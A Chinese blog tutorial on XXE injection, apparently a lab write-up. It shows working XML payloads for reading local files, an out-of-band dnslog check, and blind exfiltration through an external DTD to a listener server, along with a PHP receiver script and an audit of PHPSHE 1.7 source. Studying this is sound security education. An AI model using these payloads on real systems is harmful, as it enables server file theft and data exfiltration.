XXE漏洞-黑白盒测试+无回显

最新推荐文章于 2024-07-31 19:45:42 发布
最新推荐文章于 2024-07-31 19:45:42 发布
阅读量969 收藏 4
点赞数 1
分类专栏: 漏洞文章 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/131503666
版权
文章详细介绍了XXE漏洞的概念,它发生在XML解析时允许外部实体加载,导致安全风险。文中提供了黑盒和白盒测试方法,以及如何通过XMLpayload读取文件、进行带外测试和解决无回显问题的案例。此外,还展示了如何在PHP源码中审计和利用此类漏洞。
摘要由CSDN通过智能技术生成

什么是xxe漏洞?

         XML被设计是为了传输和存储数据,XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

XXE黑盒发现:

1、获取到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试

2、不管获取的是Content-Type类型还是数据传输类型,均可尝试修改后提交测试xxe

3、XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行

XXE白盒发现:

1、可通过应用功能追踪代码定位审计

2、可通过脚本特定函数搜索定位审计

3、可通过伪协议玩法绕过相关修复等

案例:xxe漏洞-读取文件

一个登录功能

抓包发现是使用xml类型传输的数据,可能存在xxe漏洞

伪造一个读取文件的xml外部实体payload

读取文件:

<?xml version="1.0"?>

<!DOCTYPE Mikasa [

<!ENTITY test SYSTEM  "file:///d:/www.txt">

]>

<user><username>&test;</username><password>Mikasa</password></user>

www. txt内容  :xiaoheizi:请不要试图读取我

成功读取到文件内容

案例:xxe漏洞-带外测试

带外测试:为了在网站不回显时,确认漏洞是否存在

打开网站dnslog.cn获取测试域名

测试xml代码:

<?xml version="1.0" ?>

<!DOCTYPE test [

    <!ENTITY % file SYSTEM "http://eb3q1r.dnslog.cn">

    %file;

]>

<user><username>&send;</username><password>Mikasa</password></user>

更改数据包发送

dns成功接收到访问信息,说明插入的xxe漏洞payload被解析执行了,存在xxe漏洞

案例:xxe漏洞-解决无回显问题

dtd格式文件:

dtd是xml的一个实体文件,里面写的是xml的代码。可以解决拦截防护绕过问题和数据不回显问题

无回显读取文件内容的xml代码:

<?xml version="1.0"?>

<!DOCTYPE ANY[

<!ENTITY % file SYSTEM "file:///d:/www.txt">

<!ENTITY % remote SYSTEM "http://127.0.0.1:100/test.dtd">

%remote;

%all;

]>

<root>&send;</root>

意思是:读取www.txt内容,发送给http://127.0.0.1:100/test.dtd。

test.dtd内容:<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:100/get.php?file=%file;'>">

意思是:接收数据到get.php文件

get.php内容:

<?php

$data=$_GET['file'];

$myfile = fopen("file.txt", "w+");

fwrite($myfile, $data);

fclose($myfile);

?>

意思是:将接收到的数据写入到file.txt文件中。

抓包修改接收的数据为xxe漏洞payload

点击发送,127.0.0.1:100网站服务器下成功生成一个file.txt文件

打开成功获取www.txt的内容

简单来说就是:目标网站不回显,攻击者就把获取的数据发送到自己的服务器上去看

案例:xxe漏洞-phpshe1.7源码(无回显审计)

1.浏览器搜索一些xxe漏洞的函数

如:simplexml_load_string()函数

2.打开源码全局搜索漏洞函数。使用的审计工具是:Seay源代码审计系统

3.依次打开函数位置,审计代码发现大概率存在xxe漏洞

4.可以看到pe_getxml函数调用了漏洞函数,要确定是谁调用了pe_getxml

选中函数---右键---全局搜索

5.wechat_getxml调用了pe_getxml,要确定是谁调用了wechat_getxml

最后确定是notify_url.php文件调用了wechat_getxml

6.访问notify_url文件触发wechat_getxml函数,构造Paylod测试

7.抓取访问notify_url.php文件的数据包

8.尝试读取文件无回显,使用带外测试看看有没有漏洞

dnslog有解析记录,说明存在xxe漏洞

9.使用带外传递数据解决无回显

10.发送数据包,成功在攻击者服务器生成一个file.txt文件接收读取的数据

内容:

xiaoheizi安全
关注
专栏目录
渗透测试之xxe外部实体注入
weixin_45380284的博客
03-06 750
xxe(XML外部实体注入) 参考地址:https://xz.aliyun.com/t/3357 理论: XXE漏洞发生在应用程序解析xml输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害 防御: 手动名单过滤(不推荐) 过滤关键词:<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
Day60:WEB攻防-XML&XXE安全&无回显方案&OOB盲注&DTD外部实体&白盒挖掘
qq_61553520的博客
04-01 1693
小迪安全-Day60:WEB攻防-XML&XXE安全&无回显方案&OOB盲注&DTD外部实体&白盒挖掘
XXE漏洞
qq_44768719的博客
11-04 320
** XXE漏洞 ** 这里是引用 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 ...
回显练习~XXE注入
最新发布
weixin_67832625的博客
07-31 204
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。
浅析无回显XXE(Blind XXE
蚁景网安学院
05-11 1301
XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。 外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。 但是,在处理外部实体时,可以针对应用程序启动许多攻击。
XXE回显攻击详解
永远是少年
12-23 1549
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE回显攻击详解。 一、XXE回显攻击简介 二、XXE回显攻击实战
windows文件读取 xxe_XXE原来如此简单(无回显篇)
weixin_35531726的博客
01-06 1076
可能有人会好奇我为什么非要分成两篇来分享呢?我的考虑是学习需要循序渐进学习也不可能一蹴而就短暂的爆发式学习状态会让一个人丧失后续的学习动力,当然不是所有人都这样。但是绝大多数是这样的。相信你看到这篇文章的时候,你已经掌握了 回显XXE的发现和利用重点: 那么在回显XXE的发现的基础上我们来分享一下无回显XXE怎么去利用呢?既然是无回显,也就是说,我输入什么内容 ,查看什么内容,我们都将...
XXE漏洞复现(有无回显
cainiao17441898的博客
07-01 1784
环境:这里可以在metasploitable中进行试验,不可以在centos中进行试验,因为默认情况下centos中已经修复相关漏洞。libxml2.9.0之后默认不执行外部实体。用命令:rpm -qa | grep libxml可以去查看libxml的版本。 复现: 先去生成一个解析xml数据并打印传入的数据的一个php文件。 <?php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; e
pikachu靶场练习
qaq517384的博客
01-12 2537
pikachu靶场练习暴力破解基于表单的暴力破解 暴力破解 基于表单的暴力破解 随便输入一个用户名和密码,然后bp抓包 抓包送入intruder模块 选中第四个模式 为账号和密码分别导入自己的字典,就可以start attack开始爆破了 根据相应的长度判断是否登陆成功 爆破出一个简单的账号密码:admin/123456 ...
pikachu靶场练习通关加知识点总结
qq_45584159的博客
12-11 7857
pikachu靶场练习 文章目录pikachu靶场练习前言一.暴力破解1.1 基于表单的暴力破解1.2验证码绕过(on sever)1.3验证码绕过(on client)1.4tokon防爆破二、xssxss概述DOM:文档对象类型xss形成的原因:xss漏洞的测试流程:1.1反射型xss(get)1.2反射型xss(post)三.CSRF四.SQL注入五.RCE六.文件包含七.不安全的文件下载八.越权九.目录遍历十.敏感信息泄露十一,PHP反序列化十二.XXE十三.重定向十四.SSRF十五.管理工具
XXE回显(使用vps-payload外带)
per_se_veran_ce的博客
03-22 2297
1、抓包写入payload 2、vps根目录下存放evil.dtd文件,监听端口设置为1333 3、开启端口监听 4、Burpsuite发送请求包 5、vps监听获得/etc/passwd的base64编码 6、解码 ...
Web安全XXE漏洞
qq_42751192的博客
08-19 535
XML 指可扩展标记语言(EXtensible Markup Language)。XML 是一种很像 HTML 的标记语言。XML 的设计宗旨是传输数据,而不是显示数据。XML 标签没有被预定义。您需要自行定义标签。XML 被设计为具有自我描述性。
xxe漏洞提取无回显数据
qq_42307546的博客
01-26 559
<?php $string_xml = '<?xml version="1.0" encoding="utf-8"?><note><to>George</to><from>John</from><heading>Reminder</heading><body>xml 实体注入</body></note>'; $xml = isset($_GET['xml'])?$_GET
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值